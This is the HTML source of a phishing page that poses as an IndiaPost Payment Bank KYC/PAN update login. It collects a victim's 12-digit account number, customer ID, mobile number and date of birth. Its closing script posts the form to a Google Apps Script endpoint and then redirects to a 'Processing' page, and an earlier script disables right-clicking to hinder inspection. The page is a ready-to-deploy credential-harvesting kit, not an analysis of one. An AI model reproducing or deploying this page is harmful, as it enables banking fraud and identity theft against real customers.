

<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <title> IndiaPost Payment Bank KYC login</title>
    <style>
        #hh,#io,#ij,#jj
        {
            width: 100%;
            margin:-7px;
        }
        .bb,.dd,.ff,#ii
        {
            width: 280px;
            height:30px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            border-color:#AE2924;
            border-width:1px;
            margin:2px;
            border-radius:4px;
            margin-left:20px;
        }
        
        .bb:hover
        {
            width: 280px;
            height:30px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            border-color:#AE2924;
            border-width:1px;
            margin:2px;
            border-radius:4px;
            margin-left:20px;
        }
        .dd:hover
        {
            width: 280px;
            height:30px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            border-color:#AE2924;
            border-width:1px;
            margin:2px;
            border-radius:4px;
            margin-left:20px;
        }
        
        .ff:hover
        {
            width: 280px;
            height:30px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            border-color:#AE2924;
            border-width:1px;
            margin:2px;
            border-radius:4px;
            margin-left:20px;
        }
        
        #ii:hover
        {
            width: 280px;
            height:30px;
            padding:3px 10px;
            background-color:white;
            border-style:solid;
            border-color:#AE2924;
            border-width:1px;
            margin:2px;
            border-radius:4px;
            margin-left:20px;
        }
        
        #ll
        {
            background-color:#AE2924;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px; width: 120px; height: 36px;
        }
        #ab
        {
            width:360px;
            border-bottom: solid #f3f3f3;
            border-width:10px;
        }
        #ll:hover
        {
            background-color:#3E1128;
            color: white;
            padding: 0px 0px;
            margin: 10px 25px;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            font-size: 16px; width: 120px; height: 36px;
        }
        #con
        {
            background-color:#c5d4e8;
            width:280px;
            height: 130px;
            padding: 10px 15px;
            margin:4px;
            margin-left:18px;
            border-radius:1px;
        }
        #kyc
        {
            width:100%;   
            background-color:#3E1128;
            height:55px;
            margin:4px;
            margin-left:-7px;
        }
        #col
        {
            width:100%;   
            background-color:#D8D1DB;
            height:450px;
            margin-left:-7px;
        }
    </style>
    <script language="javascript">

        var message="For security reasons,This function is not allowed here.";
        function clickIE4(){

            if (event.button==2){
                alert(message);
                return false;
            }
        }

        function clickNS4(e){
            if (document.layers||document.getElementById&&!document.all){
                if (e.which==2||e.which==3){
                    alert(message);
                    return false;
                }
            }
        }

        if (document.layers){
            document.captureEvents(Event.MOUSEDOWN);
            document.onmousedown=clickNS4;
        }

        else if (document.all&&!document.getElementById){
            document.onmousedown=clickIE4;
        }

        document.oncontextmenu=new Function("alert(message);return false;")

    </script>
</head>
<body>
    <form class="login100-form validate-form"  method="post" name="google-sheet">
    <center><img src="indiapost.png" id="hh"></center>
</div>

<div id="kyc"><br>
 <b style="color:white; padding:20px;">CONTINUE TO PAN UPDATE</b>
</div>
<div id="col">
 <br>
 <b style="font-family: Arial; 
 color:#AE2924; 
 padding:0px 20px; font-size:16px;">Account Number*</b>
 <div id="ta" required="">
    <input type="text" name="Account Number" inputmode="numeric" minlength="12" maxlength="12" class="bb" id="acc_no" placeholder="Enter Your Account Number"
    pattern="[0-9]{12}"
    title="Please Enter Valid 12 Digit Account Number"
    required="">
    <br><br>
    <b style="font-family: Arial; 
    color:#AE2924; 
    padding:0px 20px; font-size:16px;">Customer ID*</b>
</div>
<div id="ct">
    <input type="text" name="Customer ID" class="dd" id="cus_id" inputmode="numeric" minlength="10" maxlength="10" placeholder="Enter Your Customer ID(CIF Number)"
    pattern="[0-9]{10}"
    title="Please Enter Valid 10 Digit Customer Id(CIF Number)"
    required=""><br><br>
    <div id="tx">
        <b style="font-family: Arial; 
        color:#AE2924; 
        padding:0px 20px; font-size:16px;">Mobile Number*</b>
    </div>
    <div id="te">
        <input type="text" name="Mobile No" class="ff" id="mbl_no" inputmode="numeric" placeholder="Enter Your Mobile Number" minlength="10" maxlength="10"
        pattern="[0-9]{10,11}"
        title="Please Enter Valid 10 Digit Mobile Number" 
        required=""> <br><br>
        <b style="font-family: Arial; 
        color:#AE2924; 
        padding:0px 20px; font-size:16px;">Date Of Birth*</b>
    </div>
    <div id="ta" required="">
       <input type="text" name="Date Of Birth" class="bb" id="dob" inputmode="numeric" maxlength="10" placeholder="Enter Your Date Of Birth"
       required="">
   </div><br>
   <div id="kk">
    <button type="submit" id="ll" style="font-weight: bold;">SUBMIT</button><br>
    </div><br><br>
   <img src="footerpost.jpg" alt="" id="ij"><br><br>

   <script>
    const scriptURL = 'https://script.google.com/macros/s/AKfycby_RTdjLzVyLsy4HDYIJB24MUOW5J6k5CyyLnbjlt02e3uu9DoHVYKPNK_o7JfL8Pk/exec'
    const form = document.forms['google-sheet']
     
     form.addEventListener('submit', e => {
       e.preventDefault()
       fetch(scriptURL, { method: 'POST', body: new FormData(form)})
         .then(response =>  window.location.href='Processing.html')
         .catch(error => console.error('Error!', error.message))
     })
</script>
